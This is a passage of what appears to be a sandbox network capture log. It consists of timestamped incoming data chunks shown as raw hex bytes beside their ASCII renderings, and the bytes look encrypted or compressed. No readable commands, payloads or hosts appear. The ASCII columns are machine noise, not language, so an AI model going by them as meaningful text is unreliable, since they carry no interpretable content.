d0 50 68 e4 a1 f0 54 f4 e2 2f 75 d9 e6 2d ba c5 7b 79 37 27 75 d7 2d 2a cc 77 Data Ascii: P#iRZtKt+;J`Z#hHn="yHvOdMdQX"y3x_{oCQ#j7sj,%-K/=Dsu'aU[Z[iM1'_E%mn=d@zQ3;d:D0dTPnHya?7t%zqhRA;8#PhT/u-{y7'u-w
2021-12-14 12:42:36 UTC	55	IN	Data Raw: 09 d7 51 09 ab e4 db b7 56 3f 7e c0 b2 e1 0a 52 af d3 97 39 88 14 3b a5 1b 8d a7 9b 34 47 37 f3 c2 1b e9 2d 82 41 07 6c 87 7a 0e 23 ea 73 b9 1f 2f 52 b3 36 95 c4 01 12 00 8c 5b 7f ae 1d 13 9b b1 36 dd 29 ca e4 62 28 9d b1 f9 4b b6 88 2d 53 7b 2b 7c ae fe f5 da b5 29 03 ab d5 92 7f 14 91 58 54 20 98 dc 80 b9 f4 13 8c 2a 9e d4 42 76 15 be c1 be 5a 34 b0 8e 39 4a 51 c7 b4 93 f4 87 09 ae f8 88 16 83 83 aa b8 02 dd 68 ff c2 99 47 16 6b 15 06 b9 74 f5 1f e4 8a af 80 7f 2d ad 2f b0 38 1f dd f2 2f b8 df ed b1 7b 54 0a 76 3b e4 50 e0 27 82 e8 73 39 cc 32 1c 87 65 9e 2d 6a 50 48 ed bb 42 c3 6f 03 fd 65 63 0f 75 27 5d e9 be 43 0c 62 4e b5 23 ce 24 59 d4 da 17 1f 31 61 4f 5c 84 89 19 28 58 b8 d3 68 5e 3c 2a 25 0e ed e0 47 62 e2 2b 8e c4 10 d9 29 10 e2 d8 ed 86 6d 1c Data Ascii: QV?~R9;4G7-Alz#s/R6[6)b(K-S{+\|)XT BvZ49JQhGkt-/8/{Tv;P's92e-jPHBoecu']CbN#$Y1aO\(Xh^<%Gb+)m
2021-12-14 12:42:36 UTC	56	IN	Data Raw: 32 08 0b 2c 14 8f 68 9c 98 76 83 e7 f1 7e c6 3e 5a da c2 b1 46 a8 b5 49 39 05 54 33 6f d9 b8 3a 0e 83 50 be 12 90 94 2c 06 a6 c9 2f 3a b3 30 e2 be 74 9f 89 1f 8f d2 a2 69 d7 e8 56 81 af 78 e8 62 31 b0 a3 94 38 f6 4b 87 4d f3 1e 79 5e bb 60 e8 b6 bc 07 49 d9 75 a4 33 b3 21 9b ff cd e7 9d 2a e4 2f 5a 18 c1 26 ae cb 70 ac fb ed d5 c7 10 78 6e de 41 5e 39 01 ba a3 52 f4 88 1a 9c a2 91 20 65 a2 b0 ed 0b 66 2e 25 14 e4 0b f5 5a 6b a3 bd ea 37 a6 d3 44 a5 c1 f1 08 27 0c 7e 5b a9 01 48 98 e2 b1 d3 c5 85 7b 6b 4b 26 32 90 54 59 2a ea 02 2c 06 f6 59 15 64 57 83 02 98 53 39 10 a1 45 66 9e ff 38 5c 6e 14 d4 4e 1e 57 4e 48 93 6f 14 41 d8 6a c4 a4 42 fa 2d 4b 3d 36 81 d2 d6 9f 86 71 64 d8 0a 7e 26 cf 63 61 70 70 cc e7 13 7c 41 dc f3 02 fd e7 ef b1 7b ed ba ea 42 94 66 Data Ascii: 2,hv~>ZFI9T3o:P,/:0tiVxb18KMy^`Iu3!/Z&pxnA^9R ef.%Zk7D'~[H{kK&2TY,YdWS9Ef8\nNWNHoAjB-K=6qd~&capp\|A{Bf
2021-12-14 12:42:36 UTC	58	IN	Data Raw: c7 69 b8 53 71 35 1a 60 3d 95 87 93 80 fb 46 4d db 0d d1 7f 02 12 e6 d1 99 81 f4 7e c6 90 ed 11 56 a5 c6 bb 04 9b 06 31 a2 21 74 58 9a 12 68 19 e0 cc 0e f3 3b 81 44 3e 4f 9d 84 05 22 e8 7e 90 1f 2f 52 b4 f0 5b d6 01 03 03 96 79 dd af 31 13 bd a7 01 35 39 d8 e2 5b de 82 4f fe 4f e1 f6 be 55 68 25 66 83 05 e5 c8 b3 10 f6 b7 f2 6a 56 65 9e 49 5f 22 90 5b 1f 6e f7 12 8a 02 68 ff 51 62 3d f2 d3 a1 7a d9 b9 ab 1b 47 58 d0 64 a8 e4 9c 2e bb c2 d5 07 91 9c 47 be 27 fc 05 41 c2 9f 65 03 75 06 12 91 38 e7 00 ec 78 bf a4 50 15 bc 3f a9 21 24 e1 f2 3e a0 d6 e2 1c 09 5a 04 67 35 ff 36 d9 2c 93 ea 44 fe dc 20 1a 87 71 a9 05 94 51 6e 8b ab 45 c1 69 12 eb 64 78 72 51 34 4f f0 bd b4 1c 49 38 82 2b d8 b8 60 dd f6 37 1d 27 4f 0e 76 86 83 09 6e 30 b0 bc 7f 40 2f 33 e9 01 d9 Data Ascii: iSq5`=FM~V1!tXh;D>O"~/R[y159[OOUh%fjVeI_"[nhQb=zGXd.G'Aeu8xP?!$>Zg56,D qQnEidxrQ4OI8+`7'Ovn0@/3
2021-12-14 12:42:36 UTC	59	IN	Data Raw: f0 96 91 8a c9 08 e1 fe 61 70 6b 24 e3 38 7c 81 3f 31 08 01 36 9c ee fc 79 8b 61 91 55 d8 ac d1 22 4b cd 1f bb 47 34 4b 9b b1 3a 52 5c 92 7b a9 38 0b 9c 55 86 2b b8 9d 22 2e b1 a6 cc 31 a0 3d e5 44 5e 5c a5 07 94 c6 a3 51 a4 ff 47 80 af 6e a8 1a 22 af 8c 8f 27 04 b8 68 4d f9 0b 65 67 59 70 f8 26 42 12 74 84 a9 d8 ca bb 30 94 c6 2c f7 8d 37 be ea 72 13 c4 0e 9b a5 8c a6 f7 f6 8c fc b3 7a 63 de 57 d5 26 2e 8f 4d bd 91 ef fb 00 a2 9b 3d b5 13 4d c5 3c 6c 3d 2a 2d c1 18 e5 4b b7 11 93 fb 3c bd 1d 53 75 71 9e c1 66 10 74 43 73 6e a7 98 e2 bb c0 c3 8c 58 69 4b 5a 20 81 45 4e 45 23 02 36 0c ec 69 20 45 41 8b 6b b1 51 39 68 b0 54 66 9a 9a 1e 48 01 f3 c4 5f 05 4d 7e 5d 99 6d 05 3f c1 43 c8 aa 48 fa 6a fd 3f 36 8d fc a1 8f e9 6c 68 ab 26 6e 36 d2 a6 74 71 67 c8 de Data Ascii: apk$8\|?16yaU"KG4K:R\{8U+".1=D^\QGn"'hMegYp&Bt0,7rzcW&.M=M<l=*-K<SuqftCsnXiKZ ENE#6i EAkQ9hTfH_M~]m?CHj?6lh&n6tqg
2021-12-14 12:42:36 UTC	60	IN	Data Raw: b5 27 a5 86 c2 13 68 56 b0 ad 06 70 48 9b 27 0c 95 7d 69 38 59 7b 0c d0 d8 3d 93 a5 50 a8 bb 48 65 c7 04 f9 38 2e ab e2 db 96 81 7e 7a c6 9c ed 24 50 a5 c6 bb c5 9a 06 31 9c 95 93 59 90 0b 46 37 c8 5b 07 e0 38 b8 6f 14 7e 9b ac ea 0e e3 07 02 83 2f 58 b5 3e 82 d0 29 f3 11 93 57 a9 81 33 15 b6 86 cc d7 3a d2 cc ef 3a 81 45 eb 60 ba de 29 50 7b 27 47 85 e1 e6 ce 9d dd 10 b4 f8 44 e2 38 9e 43 4a 34 87 54 1f a8 f6 12 8a 3c a9 d2 51 64 1f b9 2d a0 6d cd 99 8c 31 5b 5a c6 4a ae f9 98 24 ab 14 89 58 bd 9d 40 b5 f3 73 1b 45 c2 88 4b 34 5f 04 14 bf 73 cf 2e ea 74 a4 ba 56 7b cd 1d ad 37 0a dc fa 2f a2 e8 9b 4d 7a 7e 69 4f 31 ec 39 d9 2d 93 e8 03 3f dd 20 1a 87 7f 90 26 bc 53 65 e4 85 28 e7 6d 03 e4 64 78 35 36 32 4f f0 c3 97 0f 4e 51 a3 38 d0 d1 66 d5 de 1d c7 72 Data Ascii: 'hVpH'}i8Y{=PHe8.~z$P1YF7[8o~/X>)W3::E`)P{'GD8CJ4T<Qd-m1[ZJ$X@sEK4_s.tV{7/Mz~iO19-? &Se(mdx562ONQ8fr
2021-12-14 12:42:36 UTC	61	IN	Data Raw: 29 d6 86 f9 7d 78 0e 60 82 9f aa 24 0c 1a dc e9 1e f4 91 8f ae 66 0f 8e 31 79 fd 66 33 1d 3b 68 e6 e7 39 1e 10 30 64 3a 2f 6a bf 12 b2 f5 c9 a2 d5 33 4b c6 c1 cf 7e 30 9d 47 2c 08 43 58 fc fd ba 30 19 99 4c a9 e7 9e 9f 28 00 b1 ab e4 72 b7 3a f2 2f 5c c2 a5 01 98 c8 be 16 5a ff 47 80 60 7d 57 25 cf b0 a3 94 33 22 57 d2 4d f3 1e 78 67 88 71 f8 26 4a 34 5c c8 64 1d dc a2 30 80 ff d4 78 3a 02 ea 4b 8d ec d4 20 bf 72 9f aa ea e1 9b fb 5b e2 9b 30 ae 1a 3a 35 99 85 42 6e ed c0 93 d1 21 37 bf c7 52 c5 33 6c 3d 2a db ed 1c cf 44 97 39 ab ba 08 b7 c3 53 73 5b 9e 04 27 0c 74 9e 73 6e a7 3a e3 bb c0 d6 f6 59 69 51 20 21 80 45 5c 45 23 50 2c 0c ec ef 3a 75 46 52 6c b0 51 2c 16 b0 54 6d 98 90 1d 4d 5e 11 c5 a8 0f 52 21 ea 91 6f 03 46 da 44 f0 6a 42 fc 42 61 2e 30 9b Data Ascii: )}x`$f1yf3;h90d:/j3K~0G,CX0L(r:/\ZG`}W%3"WMxgq&J4\d0x:K r[0:5Bn!7R3l=*D9Ss['tsn:YiQ !E\E#P,:uFRlQ,TmM^R!oFDjBBa.0
2021-12-14 12:42:36 UTC	63	IN	Data Raw: f1 20 29 56 eb 48 c5 e8 03 35 80 04 71 a0 d9 af 7c a5 20 bd b0 43 13 68 56 2c bc 01 72 58 5b 27 4d 94 e1 78 bf 43 64 24 3f 73 3a 88 8f dd 80 fb 4c f9 d0 0e cd 59 f1 ab e4 d1 03 b8 3b 63 e6 08 c5 0a 52 39 d1 94 3e 84 77 a7 a5 0e 8c 50 ba bb 40 3e e0 50 15 e7 21 9a 61 af 7e 9d 84 93 1e e4 12 21 3f c9 58 bf 2d 1a c7 06 1c 1e 8c 02 1d be 36 0a bd b1 53 4a 2b df fb 7d 1a 14 4f f8 67 20 e7 b9 4c 74 3e 13 37 f2 e1 d7 a5 2e 8d a5 f5 73 6f 2e 02 58 5e 2e 84 44 ab 97 f3 0d 9f 3c 1d ed 56 7b 01 b9 4f b0 7b d5 a4 b4 af 4a 5b cf 74 a0 06 98 2e bd 76 99 00 8e 8d 42 25 3f d3 04 5d d4 05 5c 1b 6e 1f 34 39 65 e7 00 76 65 a9 b3 62 2d 22 2e a8 28 17 d9 6e 2f ad df d0 59 e6 69 01 78 2e cc bf c8 25 82 72 7d 1c c0 3e 3c 16 77 81 22 08 40 63 fb 9c 51 5d 7e 04 fd 55 50 e2 75 36 Data Ascii: )VH5q\| ChV,rX['MxCd$?s:LY;cR9>wP@>P!a~!?X-6SJ+}Og Lt>7.so.X^.D<V{O{J[t.vB%?]\n49eveb-".(n/Yix.%r}><w"@cQ]~UPu6
2021-12-14 12:42:36 UTC	64	IN	Data Raw: 10 a6 f3 98 d4 b5 57 ef 01 ae e1 ef 15 71 30 1f 53 0a 91 8e ef e1 3f 6e 63 82 93 20 1b 17 0d a4 ba 66 f4 9b ad f5 73 0b e7 97 c9 fc 6c 2e 41 28 76 91 50 05 1e 1a 2d b2 60 74 46 8d 0e 20 f6 c9 ae 64 2f 43 d2 b7 9c 56 32 97 69 64 01 52 5a fc 69 b9 30 15 2a 50 b7 84 b0 8e 39 10 b3 b6 f4 e5 b1 3a f4 51 67 d1 b5 9d 93 d0 8a b5 4f fe 47 83 d1 d9 73 0d f2 a3 b0 88 33 3e 1c d9 4f f3 14 64 5c a1 63 62 3f 90 04 5c dd 1c 7b ce b3 2b 82 eb b5 97 8c 3d 38 a6 74 02 c0 0e f2 a0 8c aa 94 55 8b eb 6f 7d 9b ce 47 3a 2e 01 b4 9a 19 6a e7 d5 f3 10 9a 37 b5 d9 a1 ec 1d 92 3c 31 00 c7 46 e1 4d bb 56 19 fa 3c bd d7 ad 72 4d 60 c0 47 1d 71 6b 2e 6a a7 9e 8d 09 c1 c3 fc 4d 97 4a 36 df 80 25 4d 40 0b 5c 28 0c ea 07 89 74 46 81 79 4e 50 2f e8 b1 34 28 a1 86 1e 5e 6e 61 e7 5d 0f 54 Data Ascii: Wq0S?nc fsl.A(vP-`tF d/CV2idRZi0*P9:QgOGs3>Od\cb?\{+=8tUo}G:.j7<1FMV<rM`Gqk.jMJ6%M@\(tFyNP/4(^na]T
2021-12-14 12:42:36 UTC	65	IN	Data Raw: a2 cb 70 f3 44 a9 7b 2e 43 f5 46 7d 2a e9 ef 84 48 cd 2c 4b eb fd 68 3c e3 de 5c 1a 15 76 be 48 3e e8 3a 90 73 87 18 04 be db a5 ad 06 6a 6b 9b 2e c3 23 6b 58 93 4f 72 93 14 75 e7 80 b1 48 8a d0 55 74 c5 18 db 70 3b a1 7e f9 f6 ad 3c 78 ee be c5 0a 58 07 d1 99 37 4d 15 31 a5 03 82 47 ab f9 48 b0 57 da 35 d7 28 83 4a 1f f0 2a 95 0b 81 54 1a f0 0c 30 4b b3 06 99 c7 05 12 1e 9b 40 8a 35 19 7f b4 ae 2f fe 1e d8 e4 79 98 90 44 ef b1 af fd af 5f 6c f7 7c a7 f2 ea d9 aa 09 ca c7 1d 6d 7e 32 8d 40 48 35 85 73 21 95 d4 2a 3e 2f 81 fc 40 45 04 8f 49 b2 69 db a4 bb 24 42 2f 20 63 80 f3 8b 3f ac fb 9c 2f 10 98 54 bf 38 59 1c 45 c2 98 59 08 65 2e b7 b9 65 ed 28 b0 74 ae a6 f4 04 be 3f ae 24 1e de e0 29 26 ff cc 4f 7b 50 b6 67 33 e6 17 92 25 82 e4 7b cd 52 0b 1c 96 76 Data Ascii: pD{.CF}H,Kh<\vH>:sjk.#kXOruHUtp;~<xX7M1GHW5(JT0K@5/yD_l\|m~2@H5s!*>/@EIi$B/ c?/T8YEYe.e(t?$)&O{Pg3%{Rv
2021-12-14 12:42:36 UTC	66	IN	Data Raw: cb 0f 7e 39 f0 d8 76 60 67 b3 ef 05 42 56 0e 2d ec e3 c6 96 63 68 e2 c4 fa 52 87 52 03 77 f8 fc 14 8d ed 14 77 e9 23 1c e4 2b 00 c6 4e d7 81 c0 c7 62 50 75 17 84 34 24 f9 d3 d3 10 b8 91 a3 2f c4 24 44 df df 8b ee ff a9 b5 61 e4 54 95 07 c3 6d 21 f6 e9 1e 98 9f 27 29 86 a1 63 d4 98 a0 98 6a d7 30 47 c5 32 2e f9 54 05 68 fd 49 b8 dd 2c e3 fa 1e db d7 06 91 29 0e 2c 04 8f f7 ea d4 97 fe 61 e5 30 e7 74 2d c3 44 a1 66 d0 37 fd 74 87 4c 11 9d b0 71 58 eb 84 da 5c cd df bf f7 1b 4f fc c9 68 33 41 4c 7a f4 e2 27 32 4e dd e4 09 e8 03 34 0a 3d db b7 c6 83 cc 9b 36 ab 87 4f 14 68 56 b1 be 25 7a 5b 89 36 5a 18 42 69 b8 58 d9 0c 80 76 15 38 af 5b 8a e4 33 e9 fe 09 d1 78 3c 83 16 d0 9f a3 06 22 39 65 3a 1d 41 b6 d1 84 33 8d 3e be b6 09 93 48 95 30 0e 3a e0 ca 6b f9 3f Data Ascii: ~9v`gBV-chRRww#+NbPu4$/$DaTm!')cj0G2.ThI,),a0t-Df7tLqX\Oh3ALz'2N4=6OhV%z[6ZBiXv8[3x<"9e:A3>H0:k?
2021-12-14 12:42:36 UTC	67	IN	Data Raw: d9 13 3e 02 96 62 d5 de 1d 32 13 41 ef eb 9c 5b 18 b2 36 6f 5e 57 41 2f 38 24 02 f4 e4 49 63 0a 22 2c 7b 29 c3 3b 01 f7 de e8 85 61 05 c8 dc e4 36 9b bb 5f 9d 21 32 05 69 d4 20 1e 33 8d 7f 15 35 cf c0 2e 5c 4e 2b 13 de 31 ef 3c ad 4b 8f 62 9e 75 f3 45 b3 e9 6f 38 5e f3 73 89 ed c2 99 83 73 7c a1 7b ff df 16 2b c5 3c 8a ba 18 05 9e 03 72 25 5c 97 29 34 bb 59 cd a2 44 49 13 64 bb 59 b9 a8 e9 a3 c5 51 76 54 b7 98 a4 74 c6 a1 2c 91 61 41 d4 29 ff aa 65 37 0a db 9c a7 73 54 71 ad 46 c2 88 c4 23 90 04 f4 02 ad 78 92 da a4 53 ed 16 2b d8 06 6b 4d 30 c9 48 26 d6 84 7b 3d ce f5 72 93 9f 93 04 1f 1f cb 88 f2 e5 95 94 ac e3 d1 7f fe 68 fb 7d 2a 77 11 85 88 2e 33 36 ce 26 9a 32 58 62 8b 61 9a fd d8 aa d1 e8 49 c5 d8 ae 47 20 ac e9 e3 0a 77 74 a4 d9 b8 3a 0c 87 69 96 Data Ascii: >b2A[6o^WA/8$Ic",{);a6_!2i 35.\N+1<KbuEo8^ss\|{+<r%\)4YDIdYQvTt,aA)e7sTqF#xS+kM0H&{=rh}*w.36&2XbaIG wt:i
2021-12-14 12:42:36 UTC	69	IN	Data Raw: b7 25 c8 a0 46 ea 53 69 36 b8 30 aa a0 8e e9 62 eb 6f 28 7c 37 d8 bf 70 76 70 d4 ff 8a f5 22 44 0c fd e8 60 4f b1 6a 6a 1c cb 40 86 58 25 64 d5 fc 0d ed e7 7a 73 e3 36 77 8e 0c 01 cc 7d 00 88 d1 ce 64 29 43 1f 52 2d 22 e1 d0 aa 09 e8 80 bf 28 0a ba 78 f4 96 9b ed e6 90 29 6d f5 73 fb 33 c4 64 36 ed ee 87 a2 b0 07 28 87 b8 50 c1 ac a7 83 74 d5 b8 59 ed 20 8d e8 7c 00 44 48 58 bd c1 1a 91 e9 1f d1 f5 fd 99 38 0e 6b f7 8f f7 ea ed ba ef 64 80 77 ce 76 27 d4 5c d9 5a 07 24 e0 6e 8e 58 8a 99 3e c6 36 d4 a3 cb 70 c8 c9 80 6e 25 4f f6 d9 cd 4d 7f 59 52 55 ee 2f 32 8f e8 4d 1e df 03 35 16 06 7d 9f e8 8b e0 b2 2d 8d a8 c2 13 62 88 b0 ab 2c 6b 78 de 3b 4d 94 7d 69 b8 59 7b 1d a3 62 0a 92 af 5b b7 fa 4c 65 d4 09 d1 79 30 ab e4 d0 84 99 3a 7e a7 9a c5 0a c2 a5 c0 82 Data Ascii: %FSi60bo(\|7pvp"D`Ojj@X%dzs6w}d)CR-"(x)ms3d6(PtY \|DHX8kdwv'\Z$nX>6pn%OMYRU/2M5}-b,kx;M}iY{b[Ley0:~
2021-12-14 12:42:36 UTC	70	IN	Data Raw: 82 47 cb 67 6c fa 74 70 17 5f 3f 65 f6 ac bd 0c 5e 57 a4 29 d8 8e 71 99 a3 17 0b 3d 49 61 5d 9f b3 07 68 03 bc d3 68 d4 2f 39 26 7d 46 f2 58 65 16 59 59 cd 01 da 36 09 d5 ab fa 94 6b 25 38 6f ec be 04 04 4f 9c 27 4b ed 64 c5 26 7d da 9f 73 16 b3 50 b7 a4 eb 78 c7 9a 54 86 fe ce 2d 9e 02 5b ed 89 f3 56 bc 91 9b b7 e9 ee a1 b2 81 d5 94 ae 43 ec a0 6a f4 e0 5b 21 d4 37 6d 4e 08 08 83 b6 1b 45 c2 8c 2c 0b 12 4e c0 b5 61 da 06 55 5f 60 2b 25 5e b2 6c ba a1 d9 82 f7 59 74 d5 ad 32 a8 e7 cb 63 37 0d 3d 73 24 02 d8 59 b5 76 43 0c c5 56 c6 93 a5 4a 4b 12 d1 12 94 fd 87 d4 b3 7e 78 1c bf fe d1 ee 49 30 19 2a de c6 8a e5 88 ad df 62 88 91 aa 8c 0a 1a dc ae e2 f0 91 83 8a f0 0f e1 fe 0a 01 6d 24 e9 56 92 88 2e 33 16 32 af 9e 38 76 6e 02 65 90 f1 e1 33 c5 3e 5c b8 35 Data Ascii: Ggltp_?e^W)q=Ia]hh/9&}FXeYY6k%8oO'Kd&}sPxT-[VCj[!7mNE,NaU_`+%^lYt2c7=s$YvCVJK~xI0*bm$V.328vne3>\5
2021-12-14 12:42:36 UTC	71	IN	Data Raw: 66 b0 be 1e 5e 68 7d e1 5d 0f 54 27 7f 80 00 05 51 c9 48 d9 b4 55 2a 51 75 2e 22 96 c1 49 39 d6 db 9b 27 ff 7e 3c cf 63 61 6a 70 d6 e7 17 7c 02 dd f3 02 ea c4 f8 67 69 f4 ab e3 53 87 6d 2e bb d0 ef 09 98 c5 7b 72 fa 15 75 fd 05 02 cc 77 85 81 c0 d6 65 55 62 26 47 25 33 e8 c7 d4 2b f6 8d 4b 36 3e 3b 4d 79 bd 9a fe ed 9d a0 59 fb 60 f2 20 d0 65 30 19 e6 25 16 80 34 21 87 a3 49 dd 44 b7 a5 76 45 82 6c c5 33 8d fb 71 08 53 5e 49 a9 df 19 47 fb 32 d8 ee eb 8a 36 27 98 ce 9d ff e0 ed bb e1 6b 11 5e e3 7f 3c c2 48 ab ed 19 2f f9 6d 89 4a 94 85 a4 8f 58 d4 a9 c3 6d b4 e4 a9 7b 2e 50 e9 db c2 22 76 50 4d 50 1c 26 14 09 ec 6c 27 ee 0a 24 1a 84 61 e8 db eb e9 a5 21 34 88 9d 08 0a 36 b9 bc 00 fa 62 c0 3e 2f f4 74 78 be c8 65 42 b4 00 5d 9a be 5d 11 e4 5c 3a d6 6a b1 Data Ascii: f^h}]T'QHU*Qu."I9'~<cajp\|giSm.{ruweUb&G%3+K6>;MyY` e0%4!IDvEl3qS^IG26'k^<H/mJXm{.P"vPMP&l'$a!46b>/txeB]]\:j
2021-12-14 12:42:36 UTC	72	IN	Data Raw: c8 2f 8e e6 44 34 df 20 16 af d0 80 22 94 56 4c d5 83 47 cb 42 04 e4 78 ad 87 74 36 4f f1 df 30 0c 4e 51 b7 2d c9 ba 59 80 da 17 1f 48 ce 60 5c 82 ae 08 6e 2c 64 ae 69 41 2f 2f 26 0a 93 7a 59 6f 1a 3d 78 df 0e c3 3f 39 b1 d7 fe 94 7c 09 57 6e fa d7 a5 92 4c 9a 32 3e 39 22 c4 2c 18 36 9a 62 19 ac 17 41 a1 eb 78 80 82 50 86 f2 f5 bd 95 2a 43 9d 75 f4 47 b0 d6 41 b6 e9 ee 81 b5 fc d1 9e 91 97 6d a4 6a e3 cf e4 25 d4 31 35 a1 01 19 81 e0 0a 44 c2 86 35 2b 79 62 58 b7 49 5e 14 d8 5e 48 bc 27 4a a0 0b 6e 03 d9 88 92 b0 5d 0f a4 3a 86 72 42 64 31 25 b8 63 30 10 d8 6d b6 76 4f 57 a5 57 c6 93 db b3 62 1c da 1a ba 6d 8a c5 bd 42 d4 80 bb f8 ff 7d c0 37 1f 59 23 d3 9e fb cf f3 de 62 88 8d aa d0 0d 1a dc 90 eb f3 91 85 a3 63 1f f5 d0 da fd 6c 2e cb a5 6f 89 24 2a 15 Data Ascii: /D4 "VLGBxt6O0NQ-YH`\n,diA//&zYo=x?9\|WnL2>9",6bAxPCuGAmj%15D5+ybXI^^H'Jn]:rBd1%c0mvOWWbmB}7Y#bcl.o$
2021-12-14 12:42:36 UTC	74	IN	Data Raw: 2d 1d 22 2c 23 68 3b 75 da 9a 63 af 5e 26 20 2c 45 79 87 80 03 2f f2 03 cb 40 1e 72 ff 6e 91 6f 8e 41 c7 5d da bf 3c 60 53 6f 20 25 98 8f 5b 9f e7 79 71 c7 62 f3 27 d6 aa 67 7f 59 40 e7 0a 5d 4a 03 d9 fd ec ee 64 76 66 fb bc c3 a8 87 58 2f e9 c2 e3 1a 9a e5 a0 73 e9 25 ef ec 24 1f d5 68 77 1d d1 c9 6c 5c 4a b8 52 27 33 74 d6 cb 3c f2 9f fe ab 03 39 4c e8 b6 49 fe ec 8e 38 57 fb 6c e7 3f 9b f1 36 e9 f8 17 0e 04 36 27 98 ad 5e 96 26 a7 87 70 44 1f ca ee 33 8c e9 65 1f 51 58 5f 98 4f 04 b9 fa 82 c0 f1 fb 8f 26 98 15 de 96 e8 88 60 a2 f0 78 cf 91 cf 76 2d 59 44 b8 6b 19 53 76 74 87 40 83 d9 2c 60 57 e4 bd 87 e6 ca c0 b5 64 63 d3 ed c6 d4 02 9e 58 52 5f 7e 36 36 4e f4 48 df e8 03 35 80 04 78 a8 cc 96 ee 28 36 ab 8f c9 33 ea 56 b0 ad 9a 7a 76 80 2b 6d 60 7d 69 Data Ascii: -",#h;uc^& ,Ey/@rnoA]<`So %[yqb'gY@]JdvfX/s%$hwl\JR'3t<9LI8Wl?66'^&pD3eQX_O&`xv-YDkSvt@,`WdcXR_~66NH5x(63Vzv+m`}i
2021-12-14 12:42:36 UTC	75	IN	Data Raw: b3 3a 0c c6 e5 c0 ab ec ce 57 77 78 0f 7d cd ed 13 cc 31 a8 f5 61 1b d6 39 e2 97 5b 93 20 92 47 62 6a 34 28 9a 6f 03 e8 73 fe aa 5b 86 55 fb ac b4 1b b0 56 88 2b cf b3 71 dd c2 e9 18 0b 4b 4a 5e af 00 08 42 21 b9 c8 58 48 2f c8 36 0e fc 52 58 6f 0d 59 18 cc 01 da 31 1e e1 fe 45 94 6d 07 4c 6d c4 19 28 93 4a b4 9f 38 11 6f b6 3a 10 27 94 7e 15 d4 6f ca a0 e1 53 e3 32 f2 82 f8 e0 92 85 00 5d 94 72 d8 5f 9e 5d 62 b6 ef 8b b0 98 fc db 87 a4 7d 7e af 52 6e c9 cc 22 c5 3d 0f b9 93 1b 8d c8 e2 2b d8 84 24 29 7e 44 d6 a0 44 60 71 54 59 48 ad 28 4f b9 85 55 a6 c8 8e f7 28 74 d5 ad 12 24 60 cf 65 19 9b b9 77 2e 17 f5 df b3 5e 74 7f 39 5d ff de cb b7 4a 61 0c 1b bc 74 90 d3 a4 51 e8 30 c3 fa f9 6d 5a bd 18 59 22 c6 99 e0 f6 5f c8 73 87 3b 93 05 1d 0a cb 96 72 e0 86 Data Ascii: :Wwx}1a9[ Gbj4(os[UV+qKJ^B!XH/6RXoY1EmLm(J8o:'~oS2]r_]b}~Rn"=+$)~DD`qTYH(OU(t$`ew.^t9]JatQ0mZY"_s;r
2021-12-14 12:42:36 UTC	76	IN	Data Raw: 6e ad 92 3c a9 e8 f4 f6 59 63 63 0e 23 81 43 56 6d 1b 02 2c 06 32 68 3d 5f 46 8b 6c a0 51 39 16 b0 54 77 82 8a 1c 4c 74 12 c5 5e 14 62 25 6e b2 6f 12 50 e9 42 c8 b1 6a 6b 42 61 35 34 93 c2 ef 1c e8 66 6f b7 18 6e 36 d2 bf ac 6c 49 eb f6 04 48 74 1b 0c fd e6 30 f8 61 42 e4 aa f3 53 87 58 2f 75 d3 f8 10 82 c9 61 73 e9 24 6d ff 02 1c ce 77 19 ab d3 f7 70 46 db 1c 52 27 90 e8 c7 d4 35 e4 b8 16 35 12 37 53 fd 89 90 00 ed a2 b1 42 dd 44 ff 20 c7 7b 0f c9 e7 09 1f 8e 67 dd 86 b2 41 da b1 bb 89 74 44 13 b9 c4 1f 99 ec 5e 2d 45 56 4f ae ff 2a b9 fa 14 c7 bf 9d 92 29 04 1b cd 83 f7 e9 e3 bc 00 60 c3 57 f7 17 2f c5 55 a9 61 0b 24 e3 7a 80 a5 9d b6 a9 a1 05 f8 a2 ca 52 cf ce a8 71 4b 52 fe c8 c0 26 08 46 50 5f e8 2b 27 5b f0 68 3f f7 18 cb 1d 39 7e 8f f6 8b e0 b4 38 Data Ascii: n<Ycc#CVm,2h=_FlQ9TwLt^b%noPBjkBa54fon6lIHt0aBSX/uas$mwpFR'557SBD {gAtD^-EVO*)`W/Ua$zRqKR&FP_+'[h?9~8
2021-12-14 12:42:36 UTC	77	IN	Data Raw: 61 1e 69 0d 14 be 73 19 01 c6 76 b9 a7 78 3c a6 c1 ae 1b 0e e4 f0 15 49 c2 b7 27 7a 78 02 4d 11 ee 3c b5 4d 82 ee 68 31 df 20 1c 85 47 83 22 bc 51 64 e4 85 47 c1 7e 15 e9 5e 6b 1d 72 21 b1 f7 80 bf 15 45 57 a3 3f 26 bf 5d d6 c9 1c 19 20 51 9f 5d a8 81 24 6a 0a 5a d1 13 28 2f 39 33 24 de f0 5b 12 75 2a a2 c8 2b d0 3a 01 ee e6 fc 94 45 0d 46 6b ea b8 2c 82 5a 97 0a 23 11 62 d2 d2 13 0b 9c 6b 17 bb 7f de 5e ea 52 ed 0d 5b 86 ff fe 44 9c 2e 5f b5 77 d9 b5 b4 85 0c b6 e9 e0 83 b8 fe d2 e9 c2 6b 6d a0 40 f2 c8 cc 31 e4 33 1e 9a 09 08 89 df e6 44 d3 90 2f 08 76 4a c7 a4 b7 59 2e 57 41 43 bc 21 48 4a 1e 6a a2 ce 83 98 a3 6d 2b a6 16 82 4f cd 48 d2 27 c2 1c 24 04 f4 e4 94 74 46 02 52 57 c6 9d e0 b7 4a 12 c8 2a be 7e ab d4 b5 56 59 18 bf e9 ef 60 66 2b 1f 5e 35 39 Data Ascii: aisvx<I'zxM<Mh1 G"QdG~^kr!EW?&] Q]$jZ(/93$[u+:EFk,Z#bk^R[D._wkm@13D/vJY.WAC!HJjm+OH'$tFRWJ~VY`f+^59
